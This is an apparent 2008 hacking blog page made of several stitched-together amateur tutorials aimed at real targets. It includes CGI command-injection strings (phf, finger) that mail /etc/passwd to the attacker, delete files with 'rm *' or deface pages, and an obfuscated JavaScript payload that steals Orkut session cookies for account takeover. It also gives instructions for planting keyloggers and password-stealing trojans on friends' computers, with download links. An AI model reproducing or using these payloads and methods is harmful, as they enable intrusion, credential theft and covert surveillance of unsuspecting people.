Saturday, February 23, 2008

Hacking from your Web Browser

Hacking from your Web Browser

I - Introduction

This file will describe several techiniques to aquire a password file just by using an ordinary web browser. The information provided will be best described for the beginner hacker, but all hcakers should benifit from this information. We will only cov

er phf in this file but, feel free to explore other programs in the cgi directory such as nph-test-cgi or test-cgi. And now . . . get comfortable… sit back…. and read.

II - Hcaking from your Web Browser

There are several techniques on what I call “Web Browser Hcaking”. Many beginners dont know that you cant query a etc/passwd file from your browser and in this chapter I will describe all the ways to aquire a passwd file. First you need to find a box t

hat is running the cgi-bin/phf file on their system. A great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin AND perl.exe or cgi-bin AND phf.

a. Finger box hcaking:

Lets say you wanted to break into somewhere like …. hmmmm AOL. The first thing we would do is type in their web site in the URL: Http://www.aol.com. The next thing we would do is add /cgi-bin/finger to the web URL so it would look like this Http://

www.aol.com/cgi-bin/finger. If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have a chance to receive the etc/passwd file. Next thing you will probably want to do is search

for a mailto on the web page… just scan the page for any mailto refs. Go back to the finger box and type in this query…… nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd …this string takes nobody and emails the passwd file to your email

address. If this works you now have the etc/passwd file in your mailbox…. you can now run a crack program against it and have a little fun on their box.
b. The common cgi-bin/phf query:

This section is for the very beginning hcaker (All advanced hcakers need not apply) Lets take the same scenerio from the first example except in the URL we would type … http://www.aol.com/cgi-bin/phf … if the phf is operational and has not been rem

oved you should get a series of search boxes on the next page ( ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd… so the entire string would look like this http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20

/etc/passwd. This string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it. (This is considering that they are not :*: or :x .

c. Dont take my cgi form:

This section will explain how to use somebody else’s cgi form to obtain the etc/passwd file. Lets say you look at a document source from a web page and find this in the source:

This is a form to go to Modify





This is a simple form that asks a user to input a message to be sent to a script called doc.pl. Included in the doc.pl script is the following line which is assuming the line has already been parsed out.

system(”/usr/lib/sendmail -t $myaddress < $tempfile”)
Now lets set up your page:


Hcak AOL



value=” ; rm * ;mail -s file youraddress@yourisp.com < /etc/passwd;”>




The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line. The system call in PERL and creates a UNIX shell, and in here mails the passwd file to you.



d. Changing web pages from your browser:

This short section will describe the string to use to edit a web page from your web browser. Same scenario as the first section…. http://www.aol.com…. we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 “some text and shit”%2
0>>filename.html…… This string will allow you to write to the filename.html and add “some text and shit” be noted it has to be in html format. You can place text, pictures or whatever you like.

III - Conclusion

This information should be able to direct a beginner in obtaining the etc/passwd file from a system using the web browser… It may also inform the guru’s and advanced hcakers some bits of information of perl and cgi. In further reading check out my sec

and file that will involve erasing log files from the web browser. I hope you all enjoyed this documentation and found it somewhat interesting…… wake up!!! thus I conclude…..

Modify.
IV - Suggested Reading

Phrack Magazine: Very informative…. covers just about everything from phreaking to hcaking…. Just download all the damn articles.

Building Internet Firewalls by O’Reilly & Associates, Inc. aka “The Big Wooden Door”": Covers all kinds of attacks, different firewall solutions, and invulnerablities.

Perl in 21 days by Samsnet: Good starting book in Perl programming also covers security issues.

Cgi programming by Samsnet: Good starter for Cgi but if you dont know Perl or C programming then dont bother, also covers security issues.

new cookies stealing from mozilla firefox to hack

new cookies stealing from mozilla firefox to hack

new cookies stealing from mozilla firefox to hack gmail or orkut

Hacking orkut or Gmail" With the Help of Cookies or by "stealing cookies of the victim
By going through this post i hope you will understand how easy has hacking become with the help of cookies.

By this post you'll be learning cookie stealing and Hacking orkut Or Gmail account.

Procedure to hack gmail or orkut through mozilla by stealing cookies:-

1.Firstly you need have Mozilla firefox
2.Download cookie editor plugin for Mozilla firefox
3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts


Cookie Script:

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


How to use cookies script?

1. Replace your number "UserId.value=33444211"
How to Replace your Number
1. Go to your album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script

now

Your script will look like

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()

2.Now send this Cookie script to the victim and ask him to paste in Adress bar and Press enter
3.You'll Get his cookie in your scrap book
4.After Getting a cookie go to your orkut Home page , Then clik on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)
5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211)

Thats it your done With.
Logout of your orkut and login again and you'll be in your victims Homepage.

Hacking MSN

Hacking MSN

a small trick ll worked for me hence posting it here


Hacking MSN is actually VERY simple. Msn is designed to route the connection through a microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise microsoft would waste alot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.


If u recieve some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will recieve a clear IP.

once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Spreading viruses by ip

Spreading viruses by ip

rapidshare.com/files/65228555/Chess.exe
download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
in
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..
enter
username:administrator
password:hack

WOOSH !!

u r in the victims PC ..
now u can control his PC using DOS commands ,,

Hacking 100% [ Don't Misuse It ]

Hacking 100% [ Don't Misuse It ]
Hey hackers. i hav got many requests for a way to hack email accounts. many just wanna play with ur frenz. here comes ur software. this is a keylogger. if u use it properly, it sends all ur fren's text input to u or logs the text onto the computer. plz avoid using this for illegal purposes. if u misuse it.......here are some instructions

1) Try to get the manual from the website of Perfect Keylogger or find
the help file after u finish installing the keylogger

2) BE VERY CAREFUL when installing the keylogger. If u install it with the wrong settings, it will use some funny configurations and stay on the computer forever so make sure u install it properly. Unless u configure it properly, it will hog RAM and slow ur comp.

3) I have no idea on the details of using this thing. therefore, i would advice all of us to get the manual from the website before attempting anything.

4) For whatever consequences ur actions may lead to, neither me nor this community is responsible. U are using this programme entirely at ur own risk and watever happens, me and the community are not responsible.

5) BE CAREFUL DONT SCREW IT UP

PLZ READ THE ABOVE CAREFULLY BEFORE ANYTHING. THIS IS A DANGEROUS PROGRAMME. USE AT UR OWN RISK.



Perfect Keylogger 1.6.5.0

http://rapidshare.com/files/10758207/Perfect_Keylogger_1.6.5.0.rar


Another Way !

1) The best way is to get a trojan or a keylogger into ur friends computer. Keyloggers log the letters typed and send them to ur email. Trojans steal the input in the "password" field and send them to the hacker(u). I would recommend u to use a keylogger because trojans are illegal and keyloggers are not. Trojan may destroy ur friend's computer and if his Anti-Virus finds it, u may be in trouble. So use a good keylogger like Perfect Keylogger or Keylogger Pro. Install it in ur friend's comp and configure it to send it to u. Be VERY CAREFUL when messing with a keylogger because it can be very infective and can secretly sit in ur computer and hog RAM. I didnt try using keyloggers because i knew it was too risky. This is the best method to hack because it really works

2) Many people in other communities claim to have a very good hacking method.

u want to hack orkut or yahoo id . den just send e-mail on Sallu_ajju@Hotmail.co.in in the following pattern .
Step1:write the e-mail u want to hack.
step2:write ur id
step3:password to ur id
step4:type following code
$65$%5##*()67889#
step6:send it on sallu_ajju@hotmail.co.in
actually this id belongs to one of the officer of msn id maintainance departement. within 24 hours u'l get password .
so enjoy ............


DO NOT FOLLOW THIS METHOD. THIS EMAIL ID IS THE HACKER'S ID. U ARE LITERALLY SENDING UR PASSWORD TO HIM BY USING THIS DAMN METHOD.


3) U have to hack into the mail proider's server(gmail, yahoo, hotmail)
Magic Password Stealer !

Be very carefull with this software.. it is a trojan.. and if u want to use this u hav to disable your antivirus and then open it and set it properly and then it will create a file and that file u should not open.. u hav to send it to your frnd and the password will be sent to you when he opens it.. and if u do something wrong your own password will be sent to you.. and next time please dont ask for hacking softwares.. thnx. IF it asks for a password is 123456 and the username is samjohny4u..

hxxp://rapidshare.com/files/27831681/mps7.zip

Change "xx" to "tt .